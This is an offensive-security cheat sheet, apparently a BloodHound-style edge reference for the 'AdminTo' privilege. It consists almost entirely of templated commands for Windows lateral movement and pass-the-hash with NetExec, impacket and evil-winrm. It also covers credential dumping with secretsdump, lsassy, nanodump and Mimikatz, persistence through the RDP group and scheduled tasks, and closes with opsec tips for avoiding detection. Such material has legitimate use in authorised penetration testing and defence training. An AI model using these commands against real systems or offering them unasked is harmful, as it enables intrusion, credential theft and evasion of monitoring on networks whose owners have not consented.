AdminTo
Source principal has local administrator privileges on the target computer.
Applies to: User/Group/Computer β Computer
Linux Abuse
NetExec / CrackMapExec β execution
# Command execution
netexec smb <target-computer> -u <username> -p '<password>' -d <domain> -x 'whoami'
# Pass-the-Hash
netexec smb <target-computer> -u <username> -H '<ntlm-hash>' -d <domain> -x 'whoami'
# Check admin access across subnet
netexec smb <target-subnet>/24 -u <username> -p '<password>' -d <domain> --local-auth
impacket β wmiexec (semi-interactive shell)
wmiexec.py '<domain>/<username>:<password>@<target-computer>'
wmiexec.py -hashes ':<ntlm-hash>' '<domain>/<username>@<target-computer>'
wmiexec.py -k -no-pass '<domain>/<username>@<target-computer>'
impacket β psexec (SYSTEM shell, noisy)
psexec.py '<domain>/<username>:<password>@<target-computer>'
psexec.py -hashes ':<ntlm-hash>' '<domain>/<username>@<target-computer>'
impacket β smbexec
smbexec.py '<domain>/<username>:<password>@<target-computer>'
smbexec.py -hashes ':<ntlm-hash>' '<domain>/<username>@<target-computer>'
impacket β atexec (task scheduler)
atexec.py '<domain>/<username>:<password>@<target-computer>' 'whoami'
atexec.py -hashes ':<ntlm-hash>' '<domain>/<username>@<target-computer>' 'whoami'
evil-winrm (WinRM, port 5985)
evil-winrm -i <target-computer> -u <username> -p '<password>'
evil-winrm -i <target-computer> -u <username> -H '<ntlm-hash>'
Credential dumping via secretsdump
# Dump SAM + LSA + cached creds
secretsdump.py '<domain>/<username>:<password>@<target-computer>'
secretsdump.py -hashes ':<ntlm-hash>' '<domain>/<username>@<target-computer>'
# Dump NTDS.dit remotely (if DC)
secretsdump.py '<domain>/<username>:<password>@<target-computer>' -just-dc-ntlm
LSASS dump via NetExec
netexec smb <target-computer> -u <username> -p '<password>' -d <domain> -M lsassy
netexec smb <target-computer> -u <username> -p '<password>' -d <domain> -M nanodump
Windows Abuse
PsExec (SYSTEM shell)
.\PsExec.exe \\<target-computer> -u <domain>\<username> -p <password> cmd.exe
WMI execution
Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList 'cmd.exe /c whoami > C:\out.txt' -ComputerName <target-computer>
PowerShell Remoting
$cred = Get-Credential
Enter-PSSession -ComputerName <target-computer> -Credential $cred
Invoke-Command -ComputerName <target-computer> -Credential $cred -ScriptBlock { whoami }
Mimikatz β credential dump (run on target with admin)
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
mimikatz # sekurlsa::wdigest
mimikatz # lsadump::sam
RDP
mstsc /v:<target-computer>
# Add user to RDP group if needed:
net localgroup "Remote Desktop Users" <domain>\<username> /add
Scheduled task lateral movement
schtasks /create /s <target-computer> /u <domain>\<username> /p '<password>' /tn "Task" /tr "cmd.exe /c whoami > C:\out.txt" /sc once /st 00:00
schtasks /run /s <target-computer> /tn "Task"
Opsec
- PsExec creates a service (Event ID 4697/7045) β highly detectable
- WMI execution (Event ID 4688 with command line logging) β moderate detection
- WinRM (Event ID 4624 type 3) β lower noise, preferred
- secretsdump triggers multiple SMB/DRSR calls; EDR products commonly flag LSASS access
- Use
-exec-method smbexecwith wmiexec for fileless execution